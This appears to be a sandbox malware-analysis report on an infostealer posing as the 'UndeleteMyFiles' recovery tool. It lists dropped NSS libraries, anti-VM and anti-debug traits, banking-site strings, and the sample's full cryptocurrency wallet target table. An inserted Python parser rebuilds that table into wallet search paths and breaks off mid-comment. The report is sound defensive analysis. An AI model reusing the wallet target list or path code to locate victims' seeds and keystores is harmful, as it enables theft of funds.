Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\wrk\umfen\Release\UndeleteMyFilesPro.pdb source: fXg8zgxVTF.exe
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004570F0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary, 0_2_004570F0
Source: fXg8zgxVTF.exe Static PE information: real checksum: 0x367862 should be: 0x958427
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042A2BE push ecx; ret 0_2_0042A2D1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042A335 push ecx; ret 0_2_0042A348
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0040E252 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_0040E252
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: GetCursorPos,Sleep, 0_2_00443540
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe API coverage: 0.3 %
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0041C243 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator, 0_2_0041C243
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452350 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcpyW,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452350
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043E4B0 lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcpyW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindClose, 0_2_0043E4B0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452640 RegOpenKeyW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrcpyW,lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00452640
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452910 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,RegOpenKeyW,RegEnumKeyW,RegCloseKey,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegQueryValueExW,RegCloseKey,DoEnvironmentSubstW,lstrlenW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452910
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468BA0 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468BA0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468D60 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError, 0_2_00468D60
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043EEB0 FindFirstFileW,FindClose, 0_2_0043EEB0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00468FC0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,GetLastError, 0_2_00468FC0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042CF5F VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect, 0_2_0042CF5F
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWmJpE[
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: FHCAFIDB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: FHCAFIDB.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: FHCAFIDB.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: FHCAFIDB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FHCAFIDB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarer
Source: FHCAFIDB.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: FHCAFIDB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: FHCAFIDB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: FHCAFIDB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: FHCAFIDB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: FHCAFIDB.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: FHCAFIDB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: FHCAFIDB.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FHCAFIDB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: FHCAFIDB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: FHCAFIDB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: FHCAFIDB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: FHCAFIDB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW f
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042F2D9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0042F2D9
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042CF5F VirtualProtect ?,-00000001,00000104,? 0_2_0042CF5F
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004570F0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary, 0_2_004570F0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042D11E SetUnhandledExceptionFilter, 0_2_0042D11E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042F2D9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0042F2D9
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043333D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043333D
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: fXg8zgxVTF.exe Binary or memory string: Shell_TrayWnd
Source: fXg8zgxVTF.exe Binary or memory string: OLEACC.dllntdll.dllRtlRandomSecureRemoveFile%I64dInvalid DateTimeInvalid DateTimeSpanVerdanaUndeleteMyFilesUndeleteMyFilesApplication is searching for deleted files. Do you want to terminate it?UndeleteMyFilesexplorerPlease close first mail recovery tool.http://seriousbit.com/openShell_TrayWndhttp://www.seriousbit.com/exploreropenInvalid DateTimeInvalid DateTimeSpanUndeleteMyFilesChoose the folder where you want MyUnDelete application to put recovered filesUndeleteMyFilesInvalid directory name.UndeleteMyFilesThe disk letter of source files is the same as disk letter of destination. It is strongly recommended that you choose another location.
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042E05D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0042E05D
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004346F9 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_004346F9
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0040E09D _memset,GetVersionExA, 0_2_0040E09D

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: fXg8zgxVTF.exe PID: 3796, type: MEMORYSTR
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002FB5000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F2F000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.walleti
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: fXg8zgxVTF.exe, 00000000.00000002.2369765298.0000000002F8A000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
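The long pipe-delimited string recovered from memory above is the sample's wallet target table, and the resolved paths that follow it (Coinomi, MultiDoge, Ledger Live) show how the sample expands it. As an added example, not code from the report or from the sample, the Python below parses that table into `name|base|path|mask|recursive` records and rebuilds the search paths, reproducing the doubled backslashes visible in the dump. The record that was truncated at the start of the memory string is dropped rather than guessed. Base code 1 is confirmed by the report to be the roaming AppData folder; mapping code 2 to the user profile is an assumption, made because the only code-2 entries are the `.chia\mainnet` directories.

```python
"""Parser for the wallet-target table found in the sample's memory.

Added example; not code from the report or from the sample.  Field meanings
are inferred from the observed strings and the resolved paths in the report.
"""
import re
from dataclasses import dataclass

# Constructed from the memory string in the report.  The leading record was
# truncated in the dump ("...en\wallets\|*.*|1|") and is omitted here.
RAW_CONFIG = (
    r"Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|"
    r"Ethereum|1|\Ethereum\|keystore|0|"
    r"Electrum|1|\Electrum\wallets\|*.*|0|"
    r"ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|"
    r"Exodus|1|\Exodus\|exodus.conf.json|0|"
    r"Exodus|1|\Exodus\|window-state.json|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|"
    r"Electron Cash|1|\ElectronCash\wallets\|*.*|0|"
    r"MultiDoge|1|\MultiDoge\|multidoge.wallet|0|"
    r"Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|"
    r"Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|"
    r"Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|"
    r"Binance|1|\Binance\|app-store.json|0|"
    r"Binance|1|\Binance\|simple-storage.json|0|"
    r"Binance|1|\Binance\|.finger-print.fp|0|"
    r"Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|"
    r"Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|"
    r"Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|"
    r"Ledger Live|1|\Ledger Live\|*.*|0|"
    r"Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|"
    r"Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|"
    r"Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|"
    r"Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|"
    r"Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|"
    r"Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|"
    r"Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|"
    r"\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|"
    r"Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"
)

# Base-directory codes.  Code 1 is confirmed by the resolved Coinomi, MultiDoge
# and Ledger Live paths in the report (C:\Users\user\AppData\Roaming).  Code 2 is
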